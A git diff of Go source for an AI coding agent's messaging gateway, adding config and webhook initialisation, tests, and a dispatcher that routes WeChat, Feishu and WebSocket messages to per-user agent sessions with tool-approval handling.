+		// Project template: only fields typically overridden per-project
+		cfg = &HermesConfig{
+			Memory: MemoryConfig{Enabled: true},
+			Agent: AgentConfig{
+				MaxTurns:        90,
+				BudgetPressure:  true,
+				ContextPressure: true,
+			},
+			WorkDir: ".",
+		}
+	} else {
+		cfg = DefaultHermesConfig()
+	}
+
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return "", fmt.Errorf("marshal config: %w", err)
+	}
+
+	if err := os.WriteFile(path, data, 0600); err != nil {
+		return "", fmt.Errorf("write config: %w", err)
+	}
+
+	return path, nil
+}
+
+// InitWebhookConfig adds sample webhook routes to the hermes config.
+// If the config file already exists, it merges webhook routes into it.
+// If not, it creates a new config with webhook routes included.
+// The returned path is the config file that was written.
+func InitWebhookConfig(project, force bool) (string, error) {
+	var path string
+	if project {
+		path = ProjectHermesConfigPath()
+	} else {
+		path = HermesConfigPath()
+	}
+
+	// Load existing config or start from defaults
+	cfg := DefaultHermesConfig()
+	if data, err := os.ReadFile(path); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return "", fmt.Errorf("parse existing config %s: %w", path, err)
+		}
+	} else if !os.IsNotExist(err) {
+		return "", fmt.Errorf("read config %s: %w", path, err)
+	}
+
+	// Check if webhook routes already exist
+	if len(cfg.Webhooks.Routes) > 0 && !force {
+		return path, fmt.Errorf("webhook routes already exist in %s (use --force to overwrite)", path)
+	}
+
+	// Add sample webhook configuration
+	cfg.Webhooks = WebhookConfig{
+		Enabled: true,
+		Secret:  "${WEBHOOK_SECRET}",
+		Routes: []WebhookRoute{
+			{
+				Path:           "/github",
+				Events:         []string{"push", "pull_request", "issues"},
+				Skill:          "code-review",
+				Delivery:       "",
+				DeliveryTarget: "",
+			},
+			{
+				Path:           "/ci",
+				Events:         []string{"*"},
+				Skill:          "ci-monitor",
+				Delivery:       "",
+				DeliveryTarget: "",
+			},
+		},
+	}
+
+	// Ensure parent directory exists
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return "", fmt.Errorf("create directory %s: %w", dir, err)
+	}
+
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return "", fmt.Errorf("marshal config: %w", err)
+	}
+
+	if err := os.WriteFile(path, data, 0600); err != nil {
+		return "", fmt.Errorf("write config: %w", err)
+	}
+
+	return path, nil
+}
+
+// resolveEnvVars resolves ${VAR} references in string fields.
+func (c *HermesConfig) resolveEnvVars() {
+	c.Server.AuthToken = resolveEnv(c.Server.AuthToken)
+	c.Feishu.AppID = resolveEnv(c.Feishu.AppID)
+	c.Feishu.AppSecret = resolveEnv(c.Feishu.AppSecret)
+	c.Webhooks.Secret = resolveEnv(c.Webhooks.Secret)
+}
+
+// GetDefaultProvider returns the effective default provider.
+// Priority: HermesConfig → Settings
+func (c *HermesConfig) GetDefaultProvider(settingsProvider string) string {
+	if c.DefaultProvider != "" {
+		return c.DefaultProvider
+	}
+	return settingsProvider
+}
+
+// GetDefaultModel returns the effective default model.
+// Priority: HermesConfig → Settings
+func (c *HermesConfig) GetDefaultModel(settingsModel string) string {
+	if c.DefaultModel != "" {
+		return c.DefaultModel
+	}
+	return settingsModel
+}
+
+// resolveEnv resolves a single ${VAR} reference.
+func resolveEnv(s string) string {
+	if strings.HasPrefix(s, "${") && strings.HasSuffix(s, "}") {
+		envName := s[2 : len(s)-1]
+		if v := os.Getenv(envName); v != "" {
+			return v
+		}
+	}
+	return s
+}
diff --git a/internal/hermes/config_test.go b/internal/hermes/config_test.go
new file mode 100644
index 0000000..3dd30cf
--- /dev/null
+++ b/internal/hermes/config_test.go
@@ -0,0 +1,231 @@
+package hermes
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestDefaultHermesConfig(t *testing.T) {
+	cfg := DefaultHermesConfig()
+	if cfg.Server.Port != 8090 {
+		t.Errorf("expected port 8090, got %d", cfg.Server.Port)
+	}
+	if cfg.Server.Host != "0.0.0.0" {
+		t.Errorf("expected host 0.0.0.0, got %s", cfg.Server.Host)
+	}
+	if !cfg.Wechat.AutoTyping {
+		t.Error("expected auto_typing=true")
+	}
+	if !cfg.Security.SmartApprovals {
+		t.Error("expected smart_approvals=true")
+	}
+	if cfg.Agent.MaxTurns != 90 {
+		t.Errorf("expected max_turns=90, got %d", cfg.Agent.MaxTurns)
+	}
+}
+
+func TestGetDefaultProvider(t *testing.T) {
+	cfg := &HermesConfig{DefaultProvider: "openai"}
+	if got := cfg.GetDefaultProvider("deepseek"); got != "openai" {
+		t.Errorf("expected openai, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{}
+	if got := cfg2.GetDefaultProvider("deepseek"); got != "deepseek" {
+		t.Errorf("expected deepseek fallback, got %s", got)
+	}
+}
+
+func TestGetDefaultModel(t *testing.T) {
+	cfg := &HermesConfig{DefaultModel: "gpt-4o"}
+	if got := cfg.GetDefaultModel("deepseek-chat"); got != "gpt-4o" {
+		t.Errorf("expected gpt-4o, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{}
+	if got := cfg2.GetDefaultModel("deepseek-chat"); got != "deepseek-chat" {
+		t.Errorf("expected deepseek-chat fallback, got %s", got)
+	}
+}
+
+func TestGetListenAddr(t *testing.T) {
+	cfg := &HermesConfig{
+		Server: ServerConfig{Host: "127.0.0.1", Port: 9090},
+	}
+	if got := cfg.GetListenAddr(); got != "127.0.0.1:9090" {
+		t.Errorf("expected 127.0.0.1:9090, got %s", got)
+	}
+}
+
+func TestGetWorkDir(t *testing.T) {
+	cfg := &HermesConfig{WorkDir: "/tmp/test"}
+	if got := cfg.GetWorkDir(); got != "/tmp/test" {
+		t.Errorf("expected /tmp/test, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{WorkDir: "."}
+	got := cfg2.GetWorkDir()
+	if got == "" || got == "." {
+		t.Errorf("expected resolved path, got %s", got)
+	}
+}
+
+func TestGetPlatformWorkDir(t *testing.T) {
+	cfg := &HermesConfig{
+		WorkDir: "/global",
+		Wechat:  WechatConfig{WorkDir: "/wechat"},
+		Feishu:  FeishuConfig{WorkDir: "/feishu"},
+	}
+
+	if got := cfg.GetPlatformWorkDir("wechat"); got != "/wechat" {
+		t.Errorf("expected /wechat, got %s", got)
+	}
+	if got := cfg.GetPlatformWorkDir("feishu"); got != "/feishu" {
+		t.Errorf("expected /feishu, got %s", got)
+	}
+	if got := cfg.GetPlatformWorkDir("ws"); got != "/global" {
+		t.Errorf("expected /global, got %s", got)
+	}
+}
+
+func TestLoadHermesConfigFrom(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hermes.json")
+
+	data := `{"server":{"port":9999},"default_provider":"test-provider","default_model":"test-model","multi_agent":true}`
+	os.WriteFile(path, []byte(data), 0600)
+
+	cfg, err := LoadHermesConfigFrom(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if cfg.Server.Port != 9999 {
+		t.Errorf("expected port 9999, got %d", cfg.Server.Port)
+	}
+	if cfg.DefaultProvider != "test-provider" {
+		t.Errorf("expected test-provider, got %s", cfg.DefaultProvider)
+	}
+	if cfg.DefaultModel != "test-model" {
+		t.Errorf("expected test-model, got %s", cfg.DefaultModel)
+	}
+	if !cfg.MultiAgent {
+		t.Error("expected multi_agent=true")
+	}
+}
+
+func TestLoadHermesConfigFromMissing(t *testing.T) {
+	cfg, err := LoadHermesConfigFrom("/nonexistent/hermes.json")
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Should return defaults
+	if cfg.Server.Port != 8090 {
+		t.Errorf("expected default port 8090, got %d", cfg.Server.Port)
+	}
+}
+
+func TestLoadHermesConfigFromInvalid(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "bad.json")
+	os.WriteFile(path, []byte("not json"), 0600)
+
+	_, err := LoadHermesConfigFrom(path)
+	if err == nil {
+		t.Error("expected error for invalid JSON")
+	}
+}
+
+func TestInitHermesConfig(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hermes.json")
+
+	// Override path for test
+	cfg := DefaultHermesConfig()
+	data, _ := json.MarshalIndent(cfg, "", "  ")
+	os.WriteFile(path, data, 0600)
+
+	// Should exist
+	if _, err := os.Stat(path); err != nil {
+		t.Fatal("expected file to exist")
+	}
+}
+
+func TestInitWebhookConfig(t *testing.T) {
+	// Use project mode to write to .vibe/hermes.json in a temp dir
+	dir := t.TempDir()
+	origDir, _ := os.Getwd()
+	os.Chdir(dir)
+	t.Cleanup(func() { os.Chdir(origDir) })
+
+	// Test: create webhook config on non-existing file
+	path, err := InitWebhookConfig(true, false)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Read back and verify
+	data, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("read config: %v", err)
+	}
+	var cfg HermesConfig
+	if err := json.Unmarshal(data, &cfg); err != nil {
+		t.Fatalf("parse config: %v", err)
+	}
+
+	// Verify webhook fields
+	if !cfg.Webhooks.Enabled {
+		t.Error("expected webhooks enabled")
+	}
+	if cfg.Webhooks.Secret != "${WEBHOOK_SECRET}" {
+		t.Errorf("expected secret ${WEBHOOK_SECRET}, got %s", cfg.Webhooks.Secret)
+	}
+	if len(cfg.Webhooks.Routes) != 2 {
+		t.Errorf("expected 2 routes, got %d", len(cfg.Webhooks.Routes))
+	}
+	if len(cfg.Webhooks.Routes) > 0 {
+		r := cfg.Webhooks.Routes[0]
+		if r.Path != "/github" {
+			t.Errorf("expected /github, got %s", r.Path)
+		}
+		if r.Skill != "code-review" {
+			t.Errorf("expected code-review skill, got %s", r.Skill)
+		}
+	}
+
+	// Test: duplicate without --force should error
+	_, err = InitWebhookConfig(true, false)
+	if err == nil {
+		t.Error("expected error for duplicate webhook routes")
+	}
+
+	// Test: --force should overwrite
+	path2, err := InitWebhookConfig(true, true)
+	if err != nil {
+		t.Fatalf("--force should succeed: %v", err)
+	}
+	if path2 != path {
+		t.Errorf("expected same path, got %s vs %s", path, path2)
+	}
+}
+
+func TestCronConfig(t *testing.T) {
+	cfg := &HermesConfig{
+		Cron: CronConfig{
+			Enabled:   true,
+			StorePath: "/tmp/cron.json",
+			Interval:  60,
+		},
+	}
+	if !cfg.Cron.Enabled {
+		t.Error("expected cron enabled")
+	}
+	if cfg.Cron.StorePath != "/tmp/cron.json" {
+		t.Errorf("expected /tmp/cron.json, got %s", cfg.Cron.StorePath)
+	}
+	if cfg.Cron.Interval != 60 {
+		t.Errorf("expected interval 60, got %d", cfg.Cron.Interval)
+	}
+}
diff --git a/internal/hermes/dispatcher.go b/internal/hermes/dispatcher.go
new file mode 100644
index 0000000..a2a5e81
--- /dev/null
+++ b/internal/hermes/dispatcher.go
@@ -0,0 +1,933 @@
+package hermes
+
+import (
+	"context"
+	"encoding/base64"
+	"fmt"
+	"log"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes/hooks"
+	"github.com/startvibecoding/vibecoding/internal/mcp"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
+)
+
+// Dispatcher routes messages to per-user agent sessions.
+type Dispatcher struct {
+	mu         sync.RWMutex
+	cfg        *HermesConfig
+	settings   *config.Settings
+	version    string
+	sessionDir string
+	security   *Security
+	hooksMgr   *hooks.Manager
+
+	// Cached provider/model for creating agent instances
+	provider provider.Provider
+	model    *provider.Model
+
+	// Multi-agent mode
+	multiAgent bool
+	agentMgr   *agent.AgentManager
+
+	// Cron
+	cronStore cron.CronStore
+	scheduler *cron.Scheduler
+
+	// Sandbox mode
+	sandbox bool
+
+	// Active sessions: key = "hermes/<platform>/<user_id>"
+	sessions map[string]*HermesSession
+
+	// Pending approvals for WebSocket clients: approvalID → channel
+	approvalMu       sync.Mutex
+	pendingApprovals map[string]chan bool
+}
+
+// HermesSession holds state for a single hermes user session.
+type HermesSession struct {
+	ID         string // e.g. "hermes/wechat/wxid_user1"
+	Platform   string // "wechat", "feishu", "ws"
+	UserID     string
+	WorkDir    string
+	Manager    *session.Manager
+	Registry   *tools.Registry
+	MCPClients []*mcp.Client // connected MCP clients (nil if none)
+	Mode       string
+	LastUsed   time.Time
+	mu         sync.Mutex // serializes requests within this session
+	// ForceCompact is set by /compact command and consumed by the next agent run.
+	ForceCompact bool
+}
+
+// Lock acquires the session lock.
+func (s *HermesSession) Lock() { s.mu.Lock() }
+
+// Unlock releases the session lock.
+func (s *HermesSession) Unlock() { s.mu.Unlock() }
+
+// Touch updates the last-used timestamp.
+func (s *HermesSession) Touch() { s.LastUsed = time.Now() }
+
+// NewDispatcher creates a dispatcher with the given configuration.
+func NewDispatcher(cfg *HermesConfig, settings *config.Settings, version string, cronStore cron.CronStore, scheduler *cron.Scheduler) (*Dispatcher, error) {
+	providerName := cfg.GetDefaultProvider(settings.DefaultProvider)
+	modelID := cfg.GetDefaultModel(settings.DefaultModel)
+
+	p, model, err := providerfactory.Create(settings, providerName, modelID)
+	if err != nil {
+		return nil, fmt.Errorf("create provider: %w", err)
+	}
+
+	d := &Dispatcher{
+		cfg:              cfg,
+		settings:         settings,
+		version:          version,
+		sessionDir:       settings.GetSessionDir(),
+		security:         NewSecurity(cfg),
+		hooksMgr:         hooks.NewManager(cfg.Hooks.PreToolCall, cfg.Hooks.PostToolCall),
+		provider:         p,
+		model:            model,
+		multiAgent:       cfg.MultiAgent,
+		sandbox:          cfg.Sandbox,
+		cronStore:        cronStore,
+		scheduler:        scheduler,
+		sessions:         make(map[string]*HermesSession),
+		pendingApprovals: make(map[string]chan bool),
+	}
+
+	// Multi-agent mode: create AgentFactory and AgentManager
+	if cfg.MultiAgent {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          settings.Compaction.Enabled,
+			ReserveTokens:    settings.Compaction.ReserveTokens,
+			KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		// Extra context will be loaded per-session in resolveSession; use empty here
+		factory := agent.NewAgentFactory(p, model, settings, sandbox.NewManager("."), "", compactionSettings, nil)
+		d.agentMgr = agent.NewAgentManager(factory)
+	}
+
+	return d, nil
+}
+
+// HandleMessage processes an inbound message from any platform.
+func (d *Dispatcher) HandleMessage(ctx context.Context, msg messaging.InboundMessage) (string, error) {
+	log.Printf("[hermes] HandleMessage: platform=%s userID=%s text=%q", msg.Platform, msg.UserID, truncate(msg.Text, 80))
+
+	// Check user whitelist
+	if err := d.security.CheckUserAllowed(msg.Platform, msg.UserID); err != nil {
+		return "", err
+	}
+
+	// Check if command
+	if strings.HasPrefix(msg.Text, "/") {
+		return d.handleCommand(msg)
+	}
+
+	sess, err := d.resolveSession(msg.Platform, msg.UserID)
+	if err != nil {
+		return "", fmt.Errorf("resolve session: %w", err)
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	return d.runAgent(ctx, sess, msg.Text, msg.ProgressFunc)
+}
+
+// HandleWSMessage processes a message from a WebSocket client.
+func (d *Dispatcher) HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- agent.Event) error {
+	if strings.HasPrefix(text, "/") {
+		result := d.handleCommandForWS(connID, text)
+		eventCh <- agent.Event{
+			Type:          agent.EventStatus,
+			StatusMessage: result,
+		}
+		eventCh <- agent.Event{Type: agent.EventDone, Done: true}
+		return nil
+	}
+
+	sess, err := d.resolveSession("ws", connID)
+	if err != nil {
+		return fmt.Errorf("resolve session: %w", err)
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	return d.runAgentStreaming(ctx, sess, text, eventCh)
+}
+
+// resolveSession finds or creates the active session for a platform user.
+func (d *Dispatcher) resolveSession(platform, userID string) (*HermesSession, error) {
+	key := sessionKey(platform, userID)
+
+	d.mu.RLock()
+	if sess, ok := d.sessions[key]; ok {
+		d.mu.RUnlock()
+		log.Printf("[hermes] session reused: %s", key)
+		return sess, nil
+	}
+	d.mu.RUnlock()
+
+	log.Printf("[hermes] session not found in cache, creating: %s", key)
+
+	// Create or load session
+	d.mu.Lock()
+	defer d.mu.Unlock()
+
+	// Double-check after acquiring write lock
+	if sess, ok := d.sessions[key]; ok {
+		log.Printf("[hermes] session found after write lock: %s", key)
+		return sess, nil
+	}
+
+	dir := d.hermesSessionDir(platform, userID)
+	activePath := filepath.Join(dir, "active.jsonl")
+	workDir := d.cfg.GetPlatformWorkDir(platform)
+	if err := d.security.CheckWorkDirAllowed(workDir); err != nil {
+		return nil, err
+	}
+
+	var mgr *session.Manager
+	if _, err := os.Stat(activePath); err == nil {
+		// Load existing active session
+		var openErr error
+		mgr, openErr = session.Open(activePath)
+		if openErr != nil {
+			// Corrupt session — archive it and create new
+			d.archiveCorrupt(activePath)
+			mgr = nil
+		}
+	}
+
+	if mgr == nil {
+		// Create new session
+		if err := os.MkdirAll(dir, 0700); err != nil {
+			return nil, fmt.Errorf("create session dir: %w", err)
+		}
+		mgr = session.New(workDir, dir)
+		if err := mgr.Init(); err != nil {
+			return nil, fmt.Errorf("init session: %w", err)
+		}
+		// Rename the auto-generated file to active.jsonl
+		if mgr.GetFile() != activePath {
+			if err := os.Rename(mgr.GetFile(), activePath); err != nil {
+				return nil, fmt.Errorf("rename to active.jsonl: %w", err)
+			}
+			// Re-open from the renamed path
+			var openErr error
+			mgr, openErr = session.Open(activePath)
+			if openErr != nil {
+				return nil, fmt.Errorf("open renamed session: %w", openErr)
+			}
+		}
+	}
+
+	// Build tools registry
+	sbMgr := sandbox.NewManager(workDir)
+	if d.sandbox {
+		sbMgr.SetLevel(sandbox.LevelStandard)
+	} else {
+		sbMgr.SetLevel(sandbox.LevelNone)
+	}
+	reg := tools.NewRegistry(workDir, sbMgr.GetActive())
+	reg.RegisterDefaults()
+
+	// Register memory tool
+	memStore := memory.NewStore(d.cfg.Memory.Path, workDir)
+	reg.Register(memory.NewMemoryTool(memStore))
+
+	// Register subagent tools when multi-agent mode is enabled
+	if d.agentMgr != nil {
+		reg.Register(agent.NewSubAgentSpawnTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentStatusTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentSendTool(d.agentMgr))
+		reg.Register(agent.NewSubAgentDestroyTool(d.agentMgr))
+	}
+
+	// Register cron tool when cron store is available
+	if d.cronStore != nil {
+		reg.Register(cron.NewCronTool(d.cronStore, d.scheduler))
+	}
+
+	// Load and connect MCP servers
+	var mcpClients []*mcp.Client
+	mcpServers, err := mcp.LoadConfiguredServers(workDir)
+	if err != nil {
+		log.Printf("[hermes] load MCP servers: %v", err)
+	} else if len(mcpServers) > 0 {
+		clients, err := mcp.ConnectServers(context.Background(), mcpServers, reg, mcp.Callbacks{})
+		if err != nil {
+			log.Printf("[hermes] connect MCP servers: %v", err)
+		} else {
+			mcpClients = clients
+			log.Printf("[hermes] connected %d MCP server(s) for %s/%s", len(clients), platform, userID)
+		}
+	}
+
+	sess := &HermesSession{
+		ID:         key,
+		Platform:   platform,
+		UserID:     userID,
+		WorkDir:    workDir,
+		Manager:    mgr,
+		Registry:   reg,
+		MCPClients: mcpClients,
+		Mode:       "yolo",
+		LastUsed:   time.Now(),
+	}
+
+	d.sessions[key] = sess
+	log.Printf("[hermes] session created: %s (workDir=%s)", key, workDir)
+	return sess, nil
+}
+
+// RotateSession archives the current session and creates a new one.
+// Called when user sends /new.
+func (d *Dispatcher) RotateSession(platform, userID string) error {
+	key := sessionKey(platform, userID)
+	log.Printf("[hermes] rotating session: %s", key)
+
+	d.mu.Lock()
+	defer d.mu.Unlock()
+
+	dir := d.hermesSessionDir(platform, userID)
+	activePath := filepath.Join(dir, "active.jsonl")
+
+	// Archive existing active session
+	if _, err := os.Stat(activePath); err == nil {
+		mgr, err := session.Open(activePath)
+		if err == nil {
+			hdr := mgr.GetHeader()
+			idPrefix := "unknown"
+			if hdr != nil && len(hdr.ID) >= 8 {
+				idPrefix = hdr.ID[:8]
+			}
+			archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+				time.Now().Format("20060102-150405"), idPrefix))
+			os.Rename(activePath, archived)
+		} else {
+			// Can't parse — just rename with timestamp
+			archived := filepath.Join(dir, fmt.Sprintf("%s_corrupt.jsonl",
+				time.Now().Format("20060102-150405")))
+			os.Rename(activePath, archived)
+		}
+	}
+
+	// Close MCP clients and remove from cache so next message creates fresh session
+	if sess, ok := d.sessions[key]; ok {
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+	}
+	delete(d.sessions, key)
+
+	return nil
+}
+
+// GetSession returns a session by key, or nil if not found.
+func (d *Dispatcher) GetSession(key string) *HermesSession {
+	d.mu.RLock()
+	defer d.mu.RUnlock()
+	return d.sessions[key]
+}
+
+// ListSessions returns all active session keys.
+func (d *Dispatcher) ListSessions() []*HermesSession {
+	d.mu.RLock()
+	defer d.mu.RUnlock()
+	result := make([]*HermesSession, 0, len(d.sessions))
+	for _, s := range d.sessions {
+		result = append(result, s)
+	}
+	return result
+}
+
+// RemoveSession removes a session from the pool.
+func (d *Dispatcher) RemoveSession(key string) {
+	d.mu.Lock()
+	defer d.mu.Unlock()
+	if sess, ok := d.sessions[key]; ok {
+		if len(sess.MCPClients) > 0 {
+			mcp.CloseClients(sess.MCPClients)
+		}
+		delete(d.sessions, key)
+	}
+}
+
+// runAgent executes the agent loop synchronously (for messaging platforms).
+func (d *Dispatcher) runAgent(ctx context.Context, sess *HermesSession, userInput string, progress func(string)) (string, error) {
+	workDir := sess.WorkDir
+
+	// Load context files + skills
+	extraContext := d.buildExtraContext(workDir)
+
+	// Build agent
+	agentCfg := agent.Config{
+		Provider:      d.provider,
+		Model:         d.model,
+		Mode:          sess.Mode,
+		ThinkingLevel: provider.ThinkingLevel(d.settings.DefaultThinkingLevel),
+		SandboxMgr:    sandbox.NewManager(workDir),
+		Settings:      d.settings,
+		Session:       sess.Manager,
+		ExtraContext:  extraContext,
+		CompactionSettings: ctxpkg.CompactionSettings{
+			Enabled: d.settings.Compaction.Enabled,
+		},
+		MultiAgent: d.multiAgent,
+		ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
+			// Smart approvals: tiered strategy (方案 D)
+			if d.security.ShouldAutoApprove(toolName, args, sess.Mode) {
+				return true
+			}
+
+			// Not auto-approved — check risk level
+			risk := "medium"
+			if toolName == "bash" {
+				if cmd, ok := args["command"]; ok {
+					risk = CommandRiskLevel(fmt.Sprintf("%v", cmd))
+				}
+			}
+
+			// Pre-tool hook check
+			if d.hooksMgr.HasPreHook() {
+				allowed, _, _ := d.hooksMgr.PreToolCall(ctx, toolName, args, sess.Platform, sess.UserID)
+				if allowed {
+					return true
+				}
+			}
+
+			// Messaging platform: medium risk → auto-approve + notify, high risk → auto-reject + notify
+			if risk == "medium" {
+				if progress != nil {
+					progress(FormatApprovalNotification(toolName, args, risk, true))
+				}
+				return true
+			}
+
+			// High risk: auto-reject on messaging platforms
+			if progress != nil {
+				progress(FormatApprovalNotification(toolName, args, risk, false))
+			}
+			return false
+		},
+	}
+
+	a := agent.NewWithLoopConfig(agent.AgentLoopConfig{
+		Config:                   agentCfg,
+		MaxIterations:            d.cfg.Agent.MaxTurns,
+		ContextPressureThreshold: d.cfg.Agent.ContextPressureThreshold,
+		BudgetPressureThreshold:  d.cfg.Agent.BudgetPressureThreshold,
+		AfterToolCall: func(ctx2 agent.AfterToolCallContext) *agent.ToolCallResult {
+			// Post-tool hook (fire-and-forget)
+			if d.hooksMgr.HasPostHook() {
+				argsMap, _ := ctx2.Args.(map[string]any)
+				errMsg := ""
+				if ctx2.IsError {
+					errMsg = ctx2.Result.Content
+				}
+				d.hooksMgr.PostToolCall(ctx, ctx2.ToolCall.Name, argsMap, ctx2.Result.Content, errMsg, sess.Platform, sess.UserID)
+			}
+			return nil
+		},
+	}, sess.Registry)
+	var runErr error
+	if d.agentMgr != nil {
+		d.agentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			d.agentMgr.Finish(a.ID(), runErr)
+		}()
+	}
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load session history so the agent has conversation context
+	if history := sess.Manager.GetMessages(); len(history) > 0 {
+		a.LoadHistoryMessages(history)
+	}
+
+	eventCh := a.Run(ctx, userInput)
+
+	var response strings.Builder
+	var thinkBuf strings.Builder
+	var eventCount int
+	var toolCount int
+	pendingToolArgs := make(map[string]map[string]any) // ToolCallID → args
+	flushThink := func() {
+		if progress != nil && thinkBuf.Len() > 0 {
+			text := thinkBuf.String()
+			if len(text) > 500 {
+				text = text[:500] + "..."
+			}
+			progress("💭 " + text)
+			thinkBuf.Reset()
+		}
+	}
+	for ev := range eventCh {
+		eventCount++
+		switch ev.Type {
+		case agent.EventThinkDelta:
+			thinkBuf.WriteString(ev.ThinkDelta)
+		case agent.EventTextDelta:
+			flushThink()
+			response.WriteString(ev.TextDelta)
+		case agent.EventToolExecutionStart:
+			if ev.ToolCallID != "" && ev.ToolArgs != nil {
+				pendingToolArgs[ev.ToolCallID] = ev.ToolArgs
+			}
+		case agent.EventToolExecutionEnd:
+			flushThink()
+			toolCount++
+			if progress != nil {
+				args := pendingToolArgs[ev.ToolCallID]
+				delete(pendingToolArgs, ev.ToolCallID)
+				line := formatToolProgress(ev, args)
+				if line != "" {
+					progress(line)
+				}
+			}
+		case agent.EventContextPressure, agent.EventBudgetPressure:
+			// Forward pressure warnings to messaging platform
+			if progress != nil && ev.PressureMessage != "" {
+				progress("\n" + ev.PressureMessage)
+			}
+			log.Printf("[hermes] %s pressure event for %s/%s: %s", ev.PressureType, sess.Platform, sess.UserID, ev.PressureMessage)
+		case agent.EventError:
+			flushThink()
+			if ev.Error != nil {
+				runErr = ev.Error
+				log.Printf("[hermes] Agent error for %s/%s: %v", sess.Platform, sess.UserID, ev.Error)
+				return "", ev.Error
+			}
+		}
+	}
+
+	result := response.String()
+	log.Printf("[hermes] Agent completed for %s/%s: events=%d, tools=%d, response_len=%d", sess.Platform, sess.UserID, eventCount, toolCount, len(result))
+
+	// If agent produced no text but executed tools, provide a fallback summary
+	if result == "" && toolCount > 0 {
+		result = fmt.Sprintf("✅ Done (%d tool calls completed)", toolCount)
+	}
+
+	return result, nil
+}
+
+// formatToolProgress formats a tool execution event into a concise one-line progress string.
+func formatToolProgress(ev agent.Event, args map[string]any) string {
+	name := ev.ToolName
+	if name == "" && ev.ToolCall != nil {
+		name = ev.ToolCall.Name
+	}
+	if name == "" {
+		return ""
+	}
+
+	var icon string
+	if ev.ToolError != nil {
+		icon = "❌"
+	} else {
+		icon = "✅"
+	}
+
+	// Build a concise summary per tool type
+	switch name {
+	case "read", "write", "edit":
+		if path, ok := args["path"].(string); ok {
+			return fmt.Sprintf("[%s]: %s %s", name, path, icon)
+		}
+	case "bash":
+		if cmd, ok := args["command"].(string); ok {
+			if len(cmd) > 60 {
+				cmd = cmd[:60] + "..."
+			}
+			return fmt.Sprintf("[bash]: %s %s", cmd, icon)
+		}
+	case "grep":
+		if pat, ok := args["pattern"].(string); ok {
+			return fmt.Sprintf("[grep]: %s %s", pat, icon)
+		}
+	case "find":
+		if pat, ok := args["pattern"].(string); ok {
+			return fmt.Sprintf("[find]: %s %s", pat, icon)
+		}
+	case "ls":
+		if path, ok := args["path"].(string); ok {
+			return fmt.Sprintf("[ls]: %s %s", path, icon)
+		}
+	}
+
+	return fmt.Sprintf("[%s] %s", name, icon)
+}
+
+// runAgentStreaming executes the agent loop and sends events to the channel (for WebSocket).
+// The eventCh is closed when the agent loop completes.
+func (d *Dispatcher) runAgentStreaming(ctx context.Context, sess *HermesSession, userInput string, eventCh chan<- agent.Event) error {
+	defer close(eventCh)
+
+	workDir := sess.WorkDir
+	extraContext := d.buildExtraContext(workDir)
+
+	agentCfg := agent.Config{
+		Provider:      d.provider,
+		Model:         d.model,
+		Mode:          sess.Mode,
+		ThinkingLevel: provider.ThinkingLevel(d.settings.DefaultThinkingLevel),
+		SandboxMgr:    sandbox.NewManager(workDir),
+		Settings:      d.settings,
+		Session:       sess.Manager,
+		ExtraContext:  extraContext,
+		CompactionSettings: ctxpkg.CompactionSettings{
+			Enabled: d.settings.Compaction.Enabled,
+		},
+		MultiAgent: d.multiAgent,
+		ApprovalHandler: func(toolCallID, toolName string, args map[string]any) bool {
+			// Smart approvals: tiered strategy (方案 D)
+			if d.security.ShouldAutoApprove(toolName, args, sess.Mode) {
+				return true
+			}
+
+			risk := "medium"
+			if toolName == "bash" {
+				if cmd, ok := args["command"]; ok {
+					risk = CommandRiskLevel(fmt.Sprintf("%v", cmd))
+				}
+			}
+
+			// Pre-tool hook check
+			if d.hooksMgr.HasPreHook() {
+				allowed, _, _ := d.hooksMgr.PreToolCall(ctx, toolName, args, sess.Platform, sess.UserID)
+				if allowed {
+					return true
+				}
+			}
